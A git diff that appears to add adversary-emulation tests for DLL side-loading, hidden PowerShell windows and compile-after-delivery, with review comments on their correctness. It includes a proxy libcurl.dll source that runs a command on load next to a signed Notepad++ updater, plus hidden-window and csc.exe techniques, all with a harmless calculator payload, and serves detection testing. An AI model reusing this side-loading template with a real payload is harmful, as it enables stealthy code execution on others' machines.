diff --git a/atomics/T1073/T1073.yaml b/atomics/T1073/T1073.yaml
new file mode 100644
index 00000000..ec92f37b
--- /dev/null
+++ b/atomics/T1073/T1073.yaml
@@ -0,0 +1,25 @@
+---
+attack_technique: T1073
+display_name: DLL Side-Loading
+
+atomic_tests:
+- name: DLL Side-Loading using the Notepad++ GUP.exe binary
+ description: |
+ GUP is an open source signed binary used by Notepad++ for software updates, and is vulnerable to DLL Side-Loading, thus enabling the libcurl dll to be loaded
+
+ supported_platforms:
+ - windows
+
+ input_arguments:
+ process_name:
+ description: Name of the created process
+ type: string
+ default: calculator.exe
+
+ executor:
+ name: command_prompt
+ elevation_required: false
+ command: |
+ $PathToAtomicsFolder\T1073\bin\GUP.exe
+ cleanup_command: |
+ taskkill /F /IM #{process_name}
\ No newline at end of file
diff --git a/atomics/T1073/bin/GUP.exe b/atomics/T1073/bin/GUP.exe
new file mode 100644
index 00000000..ad6cf0d5
Binary files /dev/null and b/atomics/T1073/bin/GUP.exe differ
diff --git a/atomics/T1073/bin/libcurl.dll b/atomics/T1073/bin/libcurl.dll
new file mode 100644
index 00000000..b608b676
Binary files /dev/null and b/atomics/T1073/bin/libcurl.dll differ
diff --git a/atomics/T1073/src/libcurl.c b/atomics/T1073/src/libcurl.c
new file mode 100644
index 00000000..f3b41d74
--- /dev/null
+++ b/atomics/T1073/src/libcurl.c
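Review bot: The `process_name` default `calculator.exe` does not match what the side-loaded DLL spawns — `src/libcurl.c` in this same commit calls `system("calc.exe")` — so `taskkill /F /IM calculator.exe` only cleans up on hosts where calc.exe is a launcher that hands off to a separate Calculator.exe (current Windows 10 builds, as far as I know) and leaves calc.exe running elsewhere; nothing in the cleanup stops GUP.exe itself either. I would make that explicit in the argument description, `description: Name of the spawned calculator process (Calculator.exe on Windows 10, calc.exe on older hosts)`. Separately, the test ships a prebuilt `bin/libcurl.dll` next to a third-party signed `bin/GUP.exe` with no compiler command, Notepad++ release or hash recorded, so a reviewer cannot tie the shipped DLL to `src/libcurl.c` or confirm the GUP.exe provenance; adding the build command and the GUP.exe source version to the description would make the artifacts auditable.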
@@ -0,0 +1,41 @@
+#include
+#include
+
+extern __declspec(dllexport) void curl_easy_setopt(void){ return; }
+extern __declspec(dllexport) void curl_easy_cleanup(void) { return; }
+extern __declspec(dllexport) void curl_easy_duphandle(void) { return; }
+extern __declspec(dllexport) void curl_easy_escape(void) { return; }
+extern __declspec(dllexport) void curl_easy_getinfo(void) { return; }
+extern __declspec(dllexport) void curl_easy_init(void) { return; }
+extern __declspec(dllexport) void curl_easy_pause(void) { return; }
+extern __declspec(dllexport) void curl_easy_perform(void) { return; }
+extern __declspec(dllexport) void curl_easy_recv(void) { return; }
+extern __declspec(dllexport) void curl_easy_reset(void) { return; }
+extern __declspec(dllexport) void curl_easy_send(void) { return; }
+extern __declspec(dllexport) void curl_easy_strerror(void) { return; }
+extern __declspec(dllexport) void curl_easy_unescape(void) { return; }
+
+void DllUnregisterServer(void)
+{
+ system("calc.exe");
+ return;
+}
+
+BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lol)
+{
+ switch (ul_reason_for_call)
+ {
+ case DLL_PROCESS_ATTACH:
+ {
+ DllUnregisterServer();
+ break;
+ }
+ case DLL_THREAD_ATTACH:
+ break;
+ case DLL_THREAD_DETACH:
+ break;
+ case DLL_PROCESS_DETACH:
+ break;
+ }
+ return TRUE;
+}
diff --git a/atomics/T1143/T1143.yaml b/atomics/T1143/T1143.yaml
new file mode 100644
index 00000000..dc9ae104
--- /dev/null
+++ b/atomics/T1143/T1143.yaml
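Review bot: `DllUnregisterServer` is invoked from the `DLL_PROCESS_ATTACH` branch of `DllMain`, so `system("calc.exe")` runs under the loader lock and, since `system()` waits for the `cmd.exe` it spawns, GUP.exe's load is blocked until that child returns — spawning a process from DllMain is unsupported by the loader, and on hosts where calc.exe stays resident rather than handing off to Calculator.exe the side-load hangs until the calculator window is closed. If the payload has to live in DllMain, at least record the constraint, `// NOTE: runs under the loader lock; system() blocks until cmd.exe exits`, or use a non-waiting spawn such as `WinExec("calc.exe", SW_SHOWNORMAL);` so attach returns promptly. The two `#include` lines at the top of the hunk appear with no header name, which looks like the angle-bracketed `<windows.h>`/`<stdlib.h>` names were lost in rendering — worth confirming they are intact in the committed file, since nothing else declares `BOOL`, `system` or the `DLL_*` constants. The unused third parameter named `lol` is conventionally `lpReserved`.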
@@ -0,0 +1,29 @@
+---
+attack_technique: T1143
+display_name: Hidden Window
+
+atomic_tests:
+- name: Hidden Window
+ description: |
+ Launch PowerShell with the "-WindowStyle Hidden" argument to conceal PowerShell windows by setting the WindowStyle parameter to hidden.
+
+ supported_platforms:
+ - windows
+
+ input_arguments:
+ powershell_command:
+ description: Command to launch calc.exe from a hidden PowerShell Window
+ type: String
+ default: powershell.exe -WindowStyle hidden calc.exe
+ powershell_process_name:
+ description: Name of the created process
+ type: string
+ default: calculator
+
+ executor:
+ name: powershell
+ elevation_required: false
+ command: |
+ Start-Process #{powershell_command}
+ cleanup_command: |
+ Stop-Process -Name "#{powershell_process_name}"
\ No newline at end of file
diff --git a/atomics/T1500/T1500.yaml b/atomics/T1500/T1500.yaml
new file mode 100644
index 00000000..a1727e4c
--- /dev/null
+++ b/atomics/T1500/T1500.yaml
@@ -0,0 +1,29 @@
+---
+attack_technique: T1500
+display_name: Compile After Delivery
+
+atomic_tests:
+- name: Compile After Delivery using csc.exe
+ description: |
+ Compile C# code using csc.exe binary used by .NET
+
+ supported_platforms:
+ - windows
+
+ input_arguments:
+ input_file:
+ description: C# code that launches calc.exe from a hidden cmd.exe Window
+ type: file
+ default: $PathToAtomicsFolder\T1500\src\calc.cs
+ output_file:
+ description: Output compiled binary
+ type: file
+ default: C:\Windows\Temp\T1500.exe
+
+ executor:
+ name: command_prompt
+ elevation_required: false
+ command: |
+ C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:#{output_file} #{input_file}
+ cleanup_command: |
+ del #{output_file}
\ No newline at end of file
diff --git a/atomics/T1500/src/calc.cs b/atomics/T1500/src/calc.cs
new file mode 100644
index 00000000..d417148f
--- /dev/null
+++ b/atomics/T1500/src/calc.cs
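Review bot: After substitution the T1143 executor runs `Start-Process powershell.exe -WindowStyle hidden calc.exe`, and as far as I can tell `-WindowStyle hidden` binds to Start-Process's own parameter while only `calc.exe` reaches the child as its argument list — so the spawned PowerShell's command line is effectively `powershell.exe calc.exe`, not the `-WindowStyle Hidden` argument the description says the test exercises, and a detection keyed on that flag in the process command line will not fire. Pass the flag to the child explicitly, e.g. `default: -WindowStyle hidden calc.exe` for `powershell_command` and `Start-Process -FilePath powershell.exe -ArgumentList "#{powershell_command}"` in the executor, and say in the description which process is hidden. Minor: `type: String` on `powershell_command` differs from the lowercase `type: string` used for every other argument in this commit.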
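Review bot: The T1500 executor hard-codes `C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe`, which is absent on 32-bit Windows, and writes `output_file` under `C:\Windows\Temp` while declaring `elevation_required: false`; the default ACL does let standard users create files there, but that directory is a common hardening target and a non-elevated test should not depend on it. I would default to the user's temp directory, `default: %TEMP%\T1500.exe`, and resolve the framework root from the environment, `%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\csc.exe` (falling back to the 32-bit `Framework` directory where `Framework64` is absent). As written the compiled binary is never executed — the command only runs csc and the cleanup deletes the output — which is fine for the technique, but worth stating in the description so nobody expects calc.exe to appear.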
@@ -0,0 +1,18 @@
+using System.Diagnostics;
+
+namespace Console
+{
+ class Program
+ {
+ static void Main(string[] args)
+ {
+ var proc = new ProcessStartInfo();
+ proc.UseShellExecute = true;
+ proc.WorkingDirectory = @"C:\Windows\System32";
+ proc.FileName = @"cmd.exe";
+ proc.Arguments = "/c calc.exe";
+ proc.WindowStyle = ProcessWindowStyle.Hidden;
+ Process.Start(proc);
+ }
+ }
+}
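Review bot: `Process.Start(proc)` returns a `Process` whose handle is never released; wrapping the call, `using (Process.Start(proc)) { }`, disposes it and keeps the fixture clean under the CA2000-style analyzers. Note that this file is compiled by the in-box `v4.0.30319\csc.exe` named in T1500.yaml in this same commit, which I believe is the legacy compiler supporting at most C# 5, so newer forms such as `using var` or `?.Dispose()` would break the test — keep the old syntax. `namespace Console` also shadows `System.Console` for anyone who later adds `using System;`; a name such as `AtomicT1500` avoids the collision. A one-line header comment stating that this source is only meant to be compiled, not run, by the T1500 test (the executor never launches the output) would explain the otherwise unused `args` and the hidden cmd.exe window.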